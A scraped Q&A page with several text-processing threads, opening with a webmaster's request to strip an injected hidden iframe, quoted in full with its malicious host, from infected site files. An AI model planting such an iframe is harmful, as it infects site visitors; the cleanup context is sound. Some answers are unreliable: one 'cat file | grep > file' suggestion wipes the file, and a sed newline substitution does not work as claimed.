I'm looking for a script to delete the following iframe malware from my linux server:
<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>
It has infected hundreads of files on my server on different websites. I tried
grep -rl ishigo.sytes.net * | sed 's/ /\ /g' | xargs sed -i 's/<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>//g'
but it just outputs:
sed: -e expression #1, char 49: unknown option to `s'
Appreciate your help :)
Cheers
Dee
Unescape the backslashes from the url in the sed regex.
This should be a more generic solution. Effectively what the malware does is look for the </body> and inject the iframe it just before that. So you can look for an iframe which is just before the </body> and replace it with just the </body>
# grep recursively for text
# escape all spaces in file names
# global search and replace with just body tag
grep -Rl "</iframe></body>" * | sed 's/ /\ /g' | xargs sed -i 's/<iframe .*><\/iframe><\/body>/<\/body>/g'
I found this other question on renaming the malware files is also useful to quickly take down all the compromised files by renaming the extensions with a .hacked at the end. Then you can fix the hack and finally remove the .hacked
Related
I need to modify an xml file using Sed to replace the line
url="jdbc:oracle:thin:#//ttpdbscan.axel.net:1521/axel.telco.net"
with
url="jdbc:oracle:thin:#//ttpdbscan.axeltelecom.net:1598/axelPRD.telco.net"
I have stored the lines like this
ACTUAL_DB=$(sed -n 's#^.*url="\(.*\).*"#\1#p' $FILE.xml)
and
NEW_DB="jdbc:oracle:thin:#//ttpdbscan.axeltelecom.net:1598/axelPRD.telco.net"
And the replacing method is this one
sed -i "s#$ACTUAL_DB#$NEW_DB#g" $File.xml
The problem is that when I run the script the file stays the same.
I have echoed the variables and all of them return the correct values.
Assuming the file you have is File.xml (if it is not a variable), you may use
sed -i "s#${ACTUAL_DB}#${NEW_DB}#g" File.xml
Try also with other delimiters:
sed -i "s~${ACTUAL_DB}~${NEW_DB}~g" File.xml
If your sed does not support -i use
sed "s~${ACTUAL_DB}~${NEW_DB}~g" File.xml 1<> File.xml
See sed edit file in place
So I saved the output into another file and found out that the string had an extra space
so it looked like this
ACTUAL_DB= "jdbc:oracle:thin:#//ttpdbscan.axel.net:1521/axel.telco.net "
I removed the extra space with
"$(echo -e "${ACTUAL_DB}" | tr -d '[:space:]')"
And now the sed is working as intended
I would like to extract css comments from style.css.
Comments are in the beginning of the css files and they are formatted like this
/*
Author:name
URI:link
etc
*/
After some searches I found :
sed -n '/^\/\*\$,/\*\/$/p' style.css
It didn't work, I had this error :
sed: -e expression #1, char 11: unknown command: `\'
Do you suggest a good solution.
If possible with a good link for a tutorial for basic sed uses for beginners.
This sed should work:
sed -n '/\/\*/,/\*\//{P;/\*\//q;D;}' style.css
I think you mean:
sed -n '/^\/\*$/,/\*\/$/p' style.css
You had $ and / in the first regep backwards.
If they are always in a colon delimited format like that, you can use:-
sed -n '/Author/p' | cut -d':' -f2
That will get you the author name. I'd definitely recommend learning about cut for colon delimited files.
I have a file like this. abc.txt
<ra><r>12.34</r><e>235</e><a>34.908</a><r>23</r><a>234.09</a><p>234</p><a>23</a></ra>
<hello>sadfaf</hello>
<hi>hiisadf</hi>
<ra><s>asdf</s><qw>345</qw><a>345</a><po>234</po><a>345</a></ra>
What I have to do is I have to find <ra> tag and for inside <ra> tag there is <a> tag whose valeus I have to replace by 0.00.
grep "<ra>" "abc.txt" | grep "<a>"
I am able to find and but I dont know how to change.
Output file for this:-
<ra><r>12.34</r><e>235</e><a>0.00</a><r>23</r><a>0.00</a><p>234</p><a>0.00</a></ra>
<hello>sadfaf</hello>
<hi>hiisadf</hi>
<ra><s>asdf</s><qw>345</qw><a>0.00</a><po>234</po><a>0.00</a></ra>
Replace using awk and gsub
awk '/^<ra>/ {gsub(/<a>[^<]*</,"<a>0.00<")}1' file
<ra><r>12.34</r><e>235</e><a>0.00</a><r>23</r><a>0.00</a><p>234</p><a>0.00</a></ra>
<hello>sadfaf</hello>
<hi>hiisadf</hi>
<ra><s>asdf</s><qw>345</qw><a>0.00</a><po>234</po><a>0.00</a></ra>
This sed should work:
sed -i.bak '/<ra>/s~\(<a>\)[^<]*\(</a>\)~\10.00\2~g' abc.txt
<ra><r>12.34</r><e>235</e><a>0.00</a><r>23</r><a>0.00</a><p>234</p><a>0.00</a></ra>
<hello>sadfaf</hello>
<hi>hiisadf</hi>
<ra><s>asdf</s><qw>345</qw><a>0.00</a><po>234</po><a>0.00</a></ra>
Because of -i (inline) switch this sed will save the changes in original file itself.
You can try with the following code:
$ sed -e '/<ra>/ s#<a>[^<]*<#<a>0.00<#g' file
<ra><r>12.34</r><e>235</e><a>0.00</a><r>23</r><a>0.00</a><p>234</p><a>0.00</a></ra>
<hello>sadfaf</hello>
<hi>hiisadf</hi>
<ra><s>asdf</s><qw>345</qw><a>0.00</a><po>234</po><a>0.00</a></ra>
It is based on this structure:
Print # in lines starting with BBB just if there was not ^# before
sed -e '/^BBB/ s/^#*/#/' -i file
changing the delimiter to a # so we do not need to escape the / in </a>.
Note that if you want the file to be updated you need to add -i to the sed (sed -i -e ...). Otherwise the result will be printed in the stdout.
I've got a script that calls grep to process a text file. Currently I am doing something like this.
$ grep 'SomeRegEx' myfile.txt > myfile.txt.temp
$ mv myfile.txt.temp myfile.txt
I'm wondering if there is any way to do in-place processing, as in store the results to the same original file without having to create a temporary file and then replace the original with the temp file when processing is done.
Of course I welcome comments as to why this should or should not be done, but I'm mainly interested in whether it can be done. In this example I'm using grep, but I'm interested about Unix tools in general. Thanks!
sponge (in moreutils package in Debian/Ubuntu) reads input till EOF and writes it into file, so you can grep file and write it back to itself.
Like this:
grep 'pattern' file | sponge file
Perl has the -i switch, so does sed and Ruby
sed -i.bak -n '/SomeRegex/p' file
ruby -i.bak -ne 'print if /SomeRegex/' file
But note that all it ever does is creating "temp" files at the back end which you think you don't see, that's all.
Other ways, besides grep
awk
awk '/someRegex/' file > t && mv t file
bash
while read -r line;do case "$line" in *someregex*) echo "$line";;esac;done <file > t && mv t file
No, in general it can't be done in Unix like this. You can only create/truncate (with >) or append to a file (with >>). Once truncated, the old contents would be lost.
In general, this can't be done. But Perl has the -i switch:
perl -i -ne 'print if /SomeRegEx/' myfile.txt
Writing -i.bak will cause the original to be saved in myfile.txt.bak.
(Of course internally, Perl just does basically what you're already doing -- there's no special magic involved.)
To edit file in-place using vim-way, try:
$ ex -s +'%!grep foo' -cxa myfile.txt
Alternatively use sed or gawk.
Most installations of sed can do in-place editing, check the man page, you probably want the -i flag.
Store in a variable and then assign it to the original file:
A=$(cat aux.log | grep 'Something') && echo "${A}" > aux.log
Take a look at my slides "Field Guide To the Perl Command-Line Options" at http://petdance.com/perl/command-line-options.pdf for more ideas on what you can do in place with Perl.
cat myfile.txt | grep 'sometext' > myfile.txt
This will find sometext in myfile.txt and save it back to myfile.txt, this will accomplish what you want. Not sure about regex, but it does work for text.
I'm trying to do the opposite of this question, replacing Unix line endings with Windows line endings, so that I can use SQL Server bcp over samba to import the file. I have sed installed but not dos2unix. I tried reversing the examples but to no avail.
Here's the command I'm using.
sed -e 's/\n/\r\n/g' myfile
I executed this and then ran od -c myfile, expecting to see \r\n where there used to be \n. But there all still \n. (Or at least they appear to be. The output of od overflows my screen buffer, so I don't get to see the beginning of the file).
I haven't been able to figure out what I'm doing wrong. Any suggestions?
When faced with this, I use a simple perl one-liner:
perl -pi -e 's/\n/\r\n/' filename
because sed behavior varies, and I know this works.
What is the problem with getting dos2unix onto the machine?
What is the platform you are working with?
Do you have GNU sed or regular non-GNU sed?
On Solaris, /usr/bin/sed requires:
sed 's/$/^M/'
where I entered the '^M' by typing controlV controlM. The '$' matches at the end of the line, and replaces the end of line with the control-M. You can script that, too.
Mechanisms expecting sed to expand '\r' or '\\r' to control-M are going to be platform-specific, at best.
You don't need the -e option.
$ matches the endline character. This sed command will insert a \r character before the end of line:
sed 's/$/\r/' myfile
Just adding a \r (aka ^M, see Jonathan Leffler's answer) in front of \n is not safe because the file might have mixed mode EOL, so then you risk ending up with some lines becomming \r\r\n. The safe thing to do is first remove all '\r' characters, and then insert (a single) \r before \n.
#!/bin/sh
sed 's/^M//g' ${1+"$#"} | sed 's/$/^M/'
Updated to use ^M.
sed 's/\([^^M]\)$/\0^M/' your_file
This makes sure you only insert a \r when there is no \r before \n. This worked for me.
Try using:
echo " this is output" > input
sed 's/$/\r/g' input |od -c
Maybe if you try it this way
cat myfile | sed 's/\n/\r\n/g' > myfile.win
will work, from my understanding your just making the replacements to the console output, you need to redirect output to a file, in this case myfile.win, then you could just rename it to whatever you want. The whole script would be (running inside a directory full of this kind of files):
#!/bin/bash
for file in $(find . -type f -name '*')
do
cat $file | sed 's/\n/\r\n/g' > $file.new
mv -f $file.new $file
done